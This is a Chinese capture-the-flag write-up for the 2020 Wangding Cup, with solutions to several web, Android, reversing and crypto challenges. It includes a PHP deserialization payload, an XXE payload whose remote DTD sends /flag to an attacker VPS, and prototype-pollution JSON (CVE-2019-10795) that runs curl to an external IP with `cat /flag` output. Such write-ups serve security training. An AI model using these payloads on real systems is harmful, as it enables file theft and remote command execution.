2020wdb_Wp

2020年第二届“网鼎杯”网络安全大赛青龙组

[TOC]

0x00 Misc签到

操作内容:

答对15道题,控制台就有flag

flag:

0x01 AreUSerialz

操作内容:

1
2
3
4
5
6
7
8
<?php
class FileHandler
{
public $op=2;
public $filename="flag.php";
}
$a = new FileHandler();
echo (serialize($a));

O:11:"FileHandler":2:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";}

flag:

flag{06c43628-fc7a-480b-b68d-0386f00ab0df}

0x02 filejava

操作内容:

有任意文件读取,但是读不到/flag
尝试读取../../../web.xml
找到具体的包名和servlet名字
然后发现文件名要改成excel-开头

CVE-2014-3529
https://xz.aliyun.com/t/6996
[Content_Types].xml

1
2
3
4
5
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE convert [
<!ENTITY % remote SYSTEM "http://vpsip/file.dtd">
%remote;%int;%send;
]>

找个vps部署
file.dtd

1
2
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://vpsip:9999?p=%file;'>">

监听9999端口,拿到flag

flag:

0x03 notes

操作内容:

CVE-2019-10795

undefsafe < 2.0.3 污染原型链

题中undefsafe(this.note_list, id + '.author', author);会导致原型链污染

/edit_note使用payload{"id":"__proto__","author":"curl 47.102.102.31:9999","raw":"curl 47.102.102.31:9999"}会触发污染

访问status,本地调试可以发现发现object污染成功

image-20200510183036397

最后使用payload

1
{"id":"__proto__","author":"curl 47.102.102.31:9999/?a=`cat /flag`","raw":"curl 47.102.102.31:9999/`cat /flag`"}

服务器成功拿到flag

flag:

image-20200510183155900

0x04 bang

操作内容:

jadx打开发现是邦邦的壳

image-20200510184010579

手机上启动frida-server,电脑端使用使用脱壳工具https://github.com/hluwa/FRIDA-DEXDump一键脱壳

1

脱壳后jadx打开dex发现flag

2

flag:

flag{borring_things}

0x05 Re_signal

操作内容:

根据v4数组中的值进行操作

1
2
3
4
5
6
7
#!/usr/bin/env python2
a=[0x22,0x3f,0x34,0x32,0x72,0x33,0x18,0xA7,0x31,0xF1,0x28,0x84,0xC1,0x1E,0x7A]
b=''
b+=chr((a[0]+5)^0x10)+chr((a[1]/3)^0x20)+chr(a[2]+3)+chr((a[3]^4)-1)+chr((a[4]+0x21)/3)+\
chr(a[5]+2)+chr((a[6]+0x20)^9)+chr((a[7]^0x24)-0x51)+chr(a[8])+chr((a[9]-0x25)/2)+\
chr((a[10]^0x41)-0x36)+chr(a[11]-0x20)+chr((a[12]-0x25)/3)+chr((a[13]+0x20)^9)+chr(a[14]-0x42)
print(b)

flag:

flag{757515121f3d478}

0x06 joker

操作内容:

简单的异或



payload:

1
"".join([chr(ord(b'hahahaha_do_you_find_me?'[i]) ^ ord(idaapi.dbg_read_memory(0x403040+4*i, 1))) for i in range(19)])+base64.b16decode("%02X"%(0x4747474747L^0x257470263A))

flag:

flag{d07abccf8a410cb37a}

0x07 Boom

操作内容

打开文件,首先算md5为en5oy,然后算三元三次方程,最后算一元二次方程得到flag。

flag:

flag{en5oy_746831_89127561}

0x08 you raise me up

操作内容

根据代码c = pow(m, bytes_to_long(flag), n)可知为离散,需要求bytes_to_long(flag)的值。
因为求离散对数,所以直接用sagemath中的discrete_log()函数。
直接构造脚本如下:

然后将其转化为字符串得到flag:

flag:

flag{5f95ca93-1594-762d-ed0b-a9139692cb4a}